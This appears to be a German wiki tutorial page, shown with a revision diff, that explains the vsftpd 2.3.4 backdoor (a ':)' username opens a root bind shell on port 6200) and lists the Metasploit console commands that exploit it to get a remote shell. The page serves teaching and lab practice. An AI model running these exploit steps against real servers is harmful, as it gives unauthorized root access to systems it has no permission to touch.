Metasploit VSFTP 2.3.4: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| (Eine dazwischenliegende Version desselben Benutzers wird nicht angezeigt) | |||
| Zeile 3: | Zeile 3: | ||
* In VSFTP Version 2.3.4 wurde eine Backdoor eingebaut, welche root-Zugriff auf den Server erlaubt | * In VSFTP Version 2.3.4 wurde eine Backdoor eingebaut, welche root-Zugriff auf den Server erlaubt | ||
* Dabei wurde eine Bind-Shell auf TCP Port 6200 geöffnet, wenn man ":)" als Nutzernamen eingibt | * Dabei wurde eine Bind-Shell auf TCP Port 6200 geöffnet, wenn man ":)" als Nutzernamen eingibt | ||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
= Metasploit benutzen = | = Metasploit benutzen = | ||
| Zeile 28: | Zeile 8: | ||
* Metasploit kann diesen Vorgang automatisieren mit dem Exploit/Payload Verfahren | * Metasploit kann diesen Vorgang automatisieren mit dem Exploit/Payload Verfahren | ||
* '''msfconsole''' | * '''msfconsole''' | ||
| + | * '''search vsftp''' | ||
* '''use exploit/unix/ftp/vsftpd_234_backdoor''' | * '''use exploit/unix/ftp/vsftpd_234_backdoor''' | ||
* '''set RHOSTS ''IP.des.ftp.servers'' ''' | * '''set RHOSTS ''IP.des.ftp.servers'' ''' | ||
Aktuelle Version vom 25. Juni 2026, 12:20 Uhr
Schwachstelle
- In VSFTP Version 2.3.4 wurde eine Backdoor eingebaut, welche root-Zugriff auf den Server erlaubt
- Dabei wurde eine Bind-Shell auf TCP Port 6200 geöffnet, wenn man ":)" als Nutzernamen eingibt
Metasploit benutzen
- Metasploit kann diesen Vorgang automatisieren mit dem Exploit/Payload Verfahren
- msfconsole
- search vsftp
- use exploit/unix/ftp/vsftpd_234_backdoor
- set RHOSTS IP.des.ftp.servers
- set RPORT 21
- set payload cmd/unix/interact
- exploit
- Nun sollte man genau wie oben eine sehr minimale Shell haben